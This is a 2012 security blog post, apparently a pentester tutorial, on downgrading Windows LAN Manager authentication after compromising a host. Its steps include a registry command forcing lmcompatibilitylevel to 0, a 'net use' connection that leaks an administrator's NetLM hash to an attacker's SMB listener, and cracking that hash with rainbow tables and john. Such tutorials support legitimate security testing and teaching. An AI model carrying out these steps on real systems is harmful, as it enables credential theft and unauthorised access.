Skip to main content

Post Exploitation Using NetNTLM Downgrade Attacks

October 04, 2012

I love to pass the hash and steal tokens as much as the next pentester, but sometimes it’s nice to have the actual password for a user. Here are some cases where having the password, instead of just the hash, is helpful:

  • Web Based VPN Login
  • GUI Access
  • Third Party AD Integrated Management Tools
  • Database Authentication
  • Passwords Shared Across Multiple Systems (Unix/Linux, Network Gear, etc)

The easiest way to go from SYSTEM on a box to dumping the cleartext passwords for all the users is to use Herman Ochoa’s Windows Credential Editor (WCE) tool to dump them from the Windows Digest Authentication package. It’s as simple as running “wce –w”. If you haven’t checked out WCE go do that now, play with it on a lab box, and come back to this post. I can wait…

Okay, now that you’re back (or already familiar with WCE), I’d like to discuss a technique that I’m calling a NetLM downgrade attack.

Here’s the scenario

We’ve exploited a box and have a meterpreter shell running as SYSTEM. We decide that we want to tread as lightly as possible to prevent detection and minimize the forensic evidence we leave behind, so we prefer not to upload any binaries (like WCE), or disable AV or whatever. There is an administrator, Joe Admin (jadmin), that is logged in to our pwned box, so we can steal his token. Win!

Net NTLM 1

Figure 1: Stealing a token from a process running as user jadmin

We’d like to crack Joe’s password, since we think he may have re-used it on the company’s Unix servers. But, what hashes do we want to use?

We can dump the MSCACHE (mscash) passwords from the logged on users via cachedump and attempt to crack those, but sufficiently long and complex passwords can take a LONG time to crack with mscash. We want hashes that are crackable within a reasonable amount of time, like over a lunch break.

Perhaps we could get the raw LM hash? That’s more difficult than it sounds, since LM is disabled on the domain. Plus, we’d have to dump it directly from the domain controller, since Joe’s account is a domain account. Also, even if we were targeting a local account, enabling LM authentication in group policy doesn’t take effect until the next time the user changes his password. How about NetLM?

NetLM and Group Policy

If you’ve encountered NetLM hashes before on a pentest, perhaps via NBNS spoofing (thanks Tim!), you know that they are easy to crack assuming you control the challenge that’s sent, which can be done with the auxiliary/server/capture/smb Metasploit module.

The issue for us, as attackers, is that on modern systems and in many Windows domains NetLM is likely to be disabled, and NetNTLM (much harder to crack) enforced through group policy. In fact there are 6 options that can be configured in group policy. They’re ordered from lowest to highest security, which also happens to be highest to lowest levels of backwards compatibility with older systems.

Here’s what that looks like in the gpedit.msc on a Windows XP box:

Net NTLM 2

Figure 2: Group policy options for LAN Manager Authentication Level
If any of the options other than the first two are enabled, our pwned box is not going to send the NetLM password to us. Here’s what we get if we set up an smb listener (auxiliary/server/capture/smb) in Metasploit with the third option, send NTLM response only, enforced:

Net NTLM 3

Figure 3: We start our SMB listener

Net NTLM 4

Figure 4: In our meterpreter session, we drop to a shell as user jadmin and connect to our smb listener

net use \\\admin$ /user:\

Net NTLM 5

Figure 5: Our smb listener receives the connection, but the NetLM hash is disabled

Now, we have an NetNTLM hash, but that’s hard to crack. What happens if we change the group policy setting to enable NetLM? Does it take effect right away? It turns out that it does.
Unlike enabling local LM hashes on a machine through group policy, which requires a password change, Microsoft allows a group policy change to immediately turn on NetLM without the need for any additional action. This is great for us, in this scenario, as it allows us to downgrade the authentication level to NetLM, which (again) is MUCH easier to crack.
Group Policy Objects reside in the registry, enabling us to enable NetLM from the command line using the reg command. We’ll get to that in a moment.
First, though, we need to figure out which registry entry corresponds with the LAN Manager Authentication GPO.

Group policy & the registry

Let’s fire up process monitor in a VM and find the corresponding registry key as we change the policy.

Net NTLM 6a

Net NTLM 6b

Figure 6: Using Process Monitor to determine the registry key for NetLM authentication

This key looks interesting:

Let’s take a look in regedit:

Net NTLM 7

Figure 7: lmcompatbility level registry key

Looks like it’s currently set to 2. After some trial and error, we figure out that values 0-5 directly correspond with the GPO.

Net NTLM 8

Figure 8: Meaning of the values in the lmcompatibility key (numbers added)

Enabling NetLM via the command line

Now that we know what key we want to change, and the value that we want to set it to (0 – Send NTLM & LM responses), we can make a note of the current value (don’t forget to set it back later!) and then make that registry change via either the reg command in meterpreter or the reg command in Windows. I’ll use these commands from a shell:

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 0 /f

Net NTLM 9

Figure 9: Current value of lmcompatibility level is 2

Net NTLM 10

Figure 10: Changing the lmcompatibilitylevel value to 0

Net NTLM 11

Figure 11: lmcompatibility level value is now 0

The policy change is immediately enforced, so we should be all set to capture the NetLM hash. Let’s just execute that net use command again:

net use \\\admin$ /user:\

Net NTLM 12

Figure 12: Connecting to smb listener from exploited box

Net NTLM 13

Figure 13: Captured both NetLM and NetNTLM hashes

Cracking the NetLM Hash

I’ll go through the process briefly below. If you want a more in-depth write-up on NetLM hash cracking, check out:

Earlier you may have noticed in the options that we set the john the ripper password output to /tmp/john. Metasploit nicely formatted the file for us for cracking purposes at /tmp/john_netntlm.

Net NTLM 14

Figure 14: Metasploit’s auxiliary/server/capture/smb john output

Net NTLM 14 after

The first 8 characters of the NetLM hash, highlighted in green above, is the first half of the LM challenge response. It can be cracked using pre-generated rainbowtables. The rest of the password can then be cracked using john. The easiest way is to use the script, located in /pentest/passwords/john on Backtrack.

So, cracking a NetLM hash is a 2 step process:

     1. Crack the first 7 characters of the password using RainbowTables
     2. Crack the second 7 characters using john the ripper’s script

Cracking the first 7 characters using rainbowtables

Since the auxiliary/capture/smb module uses a static challenge of 1122334455667788, we can use pre-generated rainbowtables to crack the first 7 characters of the NetLM password. The tables are available here, in RTI2 format:

rcracki_mt can be downloaded here:

Net NTLM 15a

Net NTLM 15b

Figure 15: Cracking the hash using rcracki_mt

Net NTLM 16

Figure 16: The first half of the admin’s password

We’ve found the first 7 characters of Joe Admin’s password, H@RD2CR, using rainbowtables. It took all of 5 minutes on my laptop.

Note that LM does not store case, so for now it’s represented in uppercase. John the ripper will use the case insensitive password to find the case sensitive password from the NTLM portion of the challenge response in a moment.

Cracking the rest of the password with john

First, we pass the first half of the password as the seed to the script, and then we run the script again with no seed to crack the case sensitive password.

./ --seed “H@RD2CR” –file /tmp/john_netntlm

./ --file /tmp/john_netntlm

Net NTLM 17a

Net NTLM 17b

Figure 17: We’ve cracked the 11 character password, but it’s still shown in all uppercase

Net NTLM 18

Figure 18: Running the script again, we find that the password is “H@rd2Cr4ck?”

Depending on the length of the password, whether you’re using a gpu, and what rules are passed to john, this could take a little while. However, since LM is cryptographically flawed and we’re only cracking the second half of the password, this will be relatively fast for most passwords. In this case, the password, “H@rd2Cr4ck?” was 11 characters and it took just under an hour.


Related Blogs

June 07, 2018

Quick Tips for Building an Effective AppSec Program – Part 3

This is the last post in my series on creating an effective AppSec program within your organization. In my last post, we discussed the importance of t...

See Details

May 10, 2018

Observations on Smoke Tests – Part 3

While attending one of our technology partner’s security training courses, the instructor presented on their product’s various features and capabiliti...

See Details

May 03, 2018

Getting Started with Postman for API Security Testing: Part 1

Postman is a useful tool used by many developers to document, test and interact with Application Programming Interfaces (APIs). With the ubiquity of A...

See Details

How Can We Help?

Let us know what you need, and we will have an Optiv professional contact you shortly.

Privacy Policy


May 09, 2018

Application Security

Learn how Optiv can help protect your most critical enterprise applications from both internal and external threats.

See Details

July 21, 2015

Network Security Solutions

Learn how we help protect your environment while maintaining connectivity.

See Details

Stay in the Know

For all the latest cybersecurity and Optiv news, subscribe to our blog and connect with us on Social.


Join our Email List

We take your privacy seriously and promise never to share your email with anyone.

Stay Connected

Find cyber security Events in your area.